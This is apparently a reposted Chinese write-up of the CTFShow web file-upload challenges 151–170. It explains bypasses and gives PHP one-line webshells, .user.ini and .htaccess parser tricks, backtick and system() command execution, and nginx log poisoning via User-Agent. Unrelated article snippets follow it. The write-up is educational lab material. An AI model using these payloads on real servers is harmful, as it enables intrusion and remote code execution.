CTFShow-WEB入门篇文件上传详细Wp(151-170)

news2024/12/22 19:56:58

WEB入门篇--命令执行详细Wp

  • 文件上传:
    • Web151:
    • Web152:
    • Web153:
    • Web154:
    • Web155:
    • Web156:
    • Web157:
    • Web158:
    • Web159:
    • Web160:
    • Web161:
    • Web162:
    • Web167:
    • Web169:
    • Web170:

CTFShow 平台:https://ctf.show/

文件上传:

Web151:

考点:前端绕过

F12修改源代码 exts后面png改为php 这样就可以上传php的文件了,然后蚁剑直接连接

在这里插入图片描述

在这里插入图片描述

可以使用插件进行post获取flag。

在这里插入图片描述

在这里插入图片描述

ctfshow{ec07a689-3422-439f-aeda-25e174588e7e}

Web152:

考点:后端不能单一校验

就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 显示上传成功 蚁剑连即可。

在这里插入图片描述

在这里插入图片描述

ctfshow{3129d70b-491d-411e-811f-b2eafca203c9}

Web153:

考点:后端不能单一校验(黑名单绕过)

.htaccess在绕过文件上传的限制中,通常在 Apache 全局配置文件 httpd.conf
有这样一条配置:AddType application/x-httpd-php .php .phtml或者
SetHandler application/x-httpd-php 将所有文件都解析为 php 文件

这里我们尝试.htaccess(因为它只适用于Apache)所以不行,这里要使用.user.ini
php.iniphp 的一个全局配置文件,对整个 web 服务起作用;而.user.ini.htaccess 一样是目录的配置文件,.user.ini 就是用户自定义的一个 php.ini,通常用这个文件来构造后门和隐藏后门。

这里先上传一个内容为:auto_prepend_file=1.pngpng,然后在正常传一个带图片得一句话木马即可。

这里如果不懂可以参考:.htaccess 和.user.ini 配置文件妙用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ctfshow{dcea4490-2c26-45a6-8027-3c19c8467554}

Web154:

考点:php关键字过滤
这里方法和上面一样传一个1.png(带一句话木马的文件)然后在上传.user.ini 文件即可

<?=eval($_POST[a]);?>## <?=相当于<?php echo

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

ctfshow{503e93c8-c013-4509-9551-5431a3b5a5ef}

Web155:

这里的方法和上一题一样,ok在做一遍 老样子先上传.user.ini.png1.png然后直接访问/upload/index.php/即可。

在这里插入图片描述
在这里插入图片描述

ctfshow{25d0b333-d5f2-4761-85a0-bed828314b6d}

Web156:

考点:过滤字符[][]可以可以使用{}代替。

这里也很简单 段标签的基础上改成{}即可 <?=eval($_POST{a});?

这里还有个小技巧如果知道flag的位置可以直接使用system()函数执行 查询即可 <?=system("tac ../f*");?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ctfshow{dec5a89b-b30b-49fd-94f3-c4c739292799}

Web157:

考点:过滤字符串 过滤了{};

这里可以使用命令执行:<?=system("tac ../f*");?> 直接访问/upload/

在这里插入图片描述

ctfshow{f7322ad8-f548-4abd-a17b-2e950fa9de2b}

Web158:

同上 一样的方法即可。

在这里插入图片描述

ctfshow{ee9f76b3-2182-4276-904f-5bfaf2afcb8f}

Web159:

这里就不能使用那种上面的方法啦,因为过滤了括号,这里显示上传报错的信息。

这里使用 `` 反引号过滤绕过即可:

<?=`tac ../f*`?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

ctfshow{f84bd0d7-6f86-4de2-bdc9-b51664a4d61c}

Web160:

考点:还是过滤字符串 这里又过滤了log 字符串 所以使用拼接绕过

可以尝试 日志包含绕过 : <?=include"/var/lo"."g/nginx/access.lo"."g"?>

还是先上传.user.ini.png进行解析 然后包含/upload/index.php/ 然后服务器是nginx

知识点:nginx的默认日志路径是:/var/log/nginx/access.log

在这里插入图片描述

直接查看源代码不然太多了日志看不出

在这里插入图片描述
在这里插入图片描述

ctfshow{8fcd0b60-1cfc-4045-b07f-9b36580c8f4f}

Web161:

考点:文件头的校验

文件头校验扩展(这里用gif):

  1. .JPEG;.JPE;.JPG,”JPGGraphic File”
  2. .gif,”GIF 89A”
  3. .zip,”Zip Compressed”
  4. .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”

在这里插入图片描述

在这里插入图片描述

使用16进制编辑器在.user.ini.png 中添加png 文件头 89 50 4E 47 0D 0A 1A 0A 1.png也添加也会成功!!

访问index.php修改User-Agent为:<?php eval($_POST[a]);?> 然后hackbar 或者蚁🗡连接!

在这里插入图片描述

ctfshow{9504ed8b-aebc-4ec0-8f91-45560fc9dc4e}

Web162:

考点:前端校验

Web167:

考点:.htaccess

这回服务器是Aapache2 所以使用.htaccess 写入:AddType application/x-httpd-php.jpg.jpg后缀的文件解析 成php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

ctfshow{416bee9a-14f4-46f1-bc4b-3f32c7559cfa}

Web169:

考点:前端校验,日志包含
前端做了校验只能传zip文件,后端又做了图片文件检查.过滤了<>php
先上传一个png 发现不符合 看来是过滤了 修改后缀为zip 发现可以 然后抓包 把类型改为image/png

先上传一个index.php,然后利用日志包含,上传.user.ini 写入以下内容进行包含然后UA里面写木马

auto_append_file="/var/log/nginx/access.log"

<?php @eval($_POST['a']);?> #User-Agent

在这里插入图片描述

ctfshow{6c50c591-4ba3-4624-b86e-de790d47fd4a}

Web170:

考点:前端验证,日志包含

先上传一个png 发现不符合 看来是过滤了 修改后缀为zip 发现可以 然后抓包 把类型改为image/png

先上传一个index.php,然后利用日志包含,上传.user.ini 写入以下内容进行包含然后UA里面写木马

auto_append_file="/var/log/nginx/access.log"

<?php @eval($_POST['a']);?> #User-Agent

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ctfshow{b563362f-15b8-4937-9571-ebc3e4a1df35}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/761548.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java:基本数据类型 和 所占大小

目录 java基本程序结构命名注释数据类型 和 大小整数类型浮点char编码boolean 变量常量final 的作用 java基本程序结构 命名 小驼峰&#xff1a;第一个单词小写&#xff0c;后面的单词大写。 大驼峰&#xff1a;每个单词都大写。 变量&#xff0c;方法&#xff1a;小驼峰。 j…

046、TiDB特性_内存悲观锁(了解)

悲观锁 传统悲观锁有两个性能问题&#xff1a; 磁盘io 需要将lock 的信息持久化到 lock CF中&#xff0c;这个时候产生磁盘io网络io 因为每个Region都是多副本&#xff0c;需要将信息通过网络 发送到Follower的lock CF中。 内存悲观锁 为了解决上面两个问题。 就有个内存悲观…

RPC学习笔记

1、Remote Procedure Call RPC的主要目标是让构建分布式更容易&#xff0c;在提供强大的远程调用能力时不损失本地调用的语义简洁性。为实现该目标&#xff0c;RPC框架需要提供一种透明的调用机制&#xff0c;让使用者不必显示的区别本地调用和远程调用。RPC不是一个协议或者方…

CodeArts Check系统规则集还不够?带你体验如何创建、启用自定义规则集

代码检查&#xff08;CodeArts Check&#xff09;是基于云端实现的代码检查服务。建立在多年自动化源代码静态检查技术积累与企业级应用经验的沉淀之上&#xff0c;为用户提供代码风格、通用质量与网络安全风险等丰富的检查能力&#xff0c;提供全面质量报告、便捷闭环处理问题…

BTY生态系统DNS关于DeSoc的构想

2022年5月&#xff0c;以太坊创始人Vitalik Buterin与经济学家Glen Weyl和Flashbots研究员Puja Ohlhaver联合发布了《Decentralized Society: Finding Web3’s Soul》。这篇论文的核心是围绕“Web3灵魂”创造出去中心化社会的可能性。 论文中阐述&#xff0c;当下Web3 更多是表…

Java语言基础

目录 一.代码注释 二.变量与常量 1.标识符 2.关键字 3.变量 4.常量 三.基本数据类型 1.整数类型 2.浮点类型 3.字符类型 1.char型 2.转义字符 4.布尔类型 一.代码注释 在代码中添加注释能提高代码的可读性。注释中包含了程序的信息&#xff0c;可以帮助程序员更…

前端学习——JS进阶 (Day3)

编程思想 面向过程编程 面向对象编程 (oop) 构造函数 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport…

第一阶段-第十章 Python基础的综合案例(数据可视化-折线图可视化)

目录 一、本章的案例介绍  1.可视化案例&#xff08;本章&#xff09;的学习目标  2.需要实现的效果图  3.数据来源 二、json数据格式  1.学习目标  2.什么是json  3. json的作用  4.json的语法要求  5.Python数据和json数据的相互转化&#xff08;dumps转json…

卷积神经网络识别人脸项目—使用百度飞桨ai计算

卷积神经网络识别人脸项目的详细过程 整个项目需要的准备文件&#xff1a; 下载链接&#xff1a; 链接&#xff1a;https://pan.baidu.com/s/1WEndfi14EhVh-8Vvt62I_w 提取码&#xff1a;7777 链接&#xff1a;https://pan.baidu.com/s/10weqx3r_zbS5gNEq-xGrzg 提取码&#x…

❤️创意网页:打造简洁美观的网页轮播图(HTML简单实现轮播图)操作简单可以直接使用

✨博主&#xff1a;命运之光 &#x1f338;专栏&#xff1a;Python星辰秘典 &#x1f433;专栏&#xff1a;web开发&#xff08;简单好用又好看&#xff09; ❤️专栏&#xff1a;Java经典程序设计 ☀️博主的其他文章&#xff1a;点击进入博主的主页 前言&#xff1a;欢迎踏入…

MQTT协议在物联网环境中的应用及代码实现解析(一)

MQTT协议全称是Message Queuing Telemetry Transport&#xff0c;翻译过来就是消息队列遥测传输协议&#xff0c;它是物联网常用的应用层协议&#xff0c;运行在TCP/IP中的应用层中&#xff0c;依赖TCP协议&#xff0c;因此它具有非常高的可靠性&#xff0c;同时它是基于TCP协议…

macos使用搭建算法竞赛c/c++的g++/gcc编译环境(homebrew,含万能头,改环境变量,vscode/clion可用)

文章目录 1、homebrew安装2、安装g3、改环境变量 1、homebrew安装 我没改镜像&#xff0c;直接网上脚本一键安装的&#xff0c;具体命令忘了&#xff0c;可能是这个 反正装这个的方法很多&#xff0c;网上一搜都有。 成功装上homebrew就行。 /bin/bash -c "$(curl -fsSL…

一款功能强大的子域收集工具OneForAll

简介 借助官方的宣传简介阐述一下&#xff1a; 在渗透测试中信息收集的重要性不言而喻&#xff0c;子域收集是信息收集中必不可少且非常重要的一环&#xff0c;目前网上也开源了许多子域收集的工具&#xff0c;但是总是存在以下部分问题&#xff1a; 不够强大&#xff0c;子域…

基于Cyclone V SoC利用HLS实现卷积手写体数字识别设计

基于Cyclone V SoC利用HLS实现卷积手写体数字识别设计 本文是基于英特尔 Cyclone V SoC 开发板&#xff0c;利用 HLS 技术实现三层卷积两层池化两层全连接推理运算的手写体数字识别设计 硬件环境&#xff1a; Cyclone V SoC开发板 SD卡 电脑 软件环境&#xff1a; Windows 11 Q…

unity3d:YooAsset shader变体收集代码解析

开始收集 YooAsset.Editor.ShaderVariantCollector.Run 创建临时场景 // 创建临时测试场景CreateTempScene();_steps ESteps.Prepare;EditorApplication.update EditorUpdate;准备阶段 反射调用ShaderUtil.ClearCurrentShaderVariantCollection清空当前项目搜集到的变体&…

第52步 深度学习图像识别:Transformer in Transformer建模(Pytorch)

基于WIN10的64位系统演示 一、写在前面 &#xff08;1&#xff09;Transformer in Transformer Transformer in Transformer&#xff08;TNT&#xff09;模型是一种新的图像分类模型&#xff0c;由研究者在2021年提出。这种模型的特点是在传统的Vision Transformer模型的基础…

FreeRTOS源码分析-1创建任务

目录 1 任务的句柄&#xff08;结构体&#xff09; 2 创建任务主要工作 2.1 创建任务初始化源码分析 2.2 任务添加到就绪列表源码分析 2.3任务堆栈的初始化源码分析 问&#xff1a;R0为什么要入栈保存&#xff1f;因为作为函数的第一个传入参数&#xff0c;必须也要保存。…

spring复习:(37)ProxyFactoryBean之getObject

该工厂bean的getObject代码如下&#xff1a; public Object getObject() throws BeansException {initializeAdvisorChain();if (isSingleton()) {return getSingletonInstance();}else {if (this.targetName null) {logger.info("Using non-singleton proxies with sing…

4.CSS图文样式

考点&#xff1a;line-height为200%时&#xff0c;font-size为40px

第十五章:DenseASPP for Semantic Segmentation in Street Scenes——在街景语义分割中的DenseASPP

0.摘要 语义图像分割是自动驾驶中的基本街景理解任务&#xff0c;在这个任务中&#xff0c;高分辨率图像中的每个像素被归类为一组语义标签。与其他场景不同&#xff0c;自动驾驶场景中的物体呈现出非常大的尺度变化&#xff0c;这给高级特征表示带来了巨大挑战&#xff0c;因为…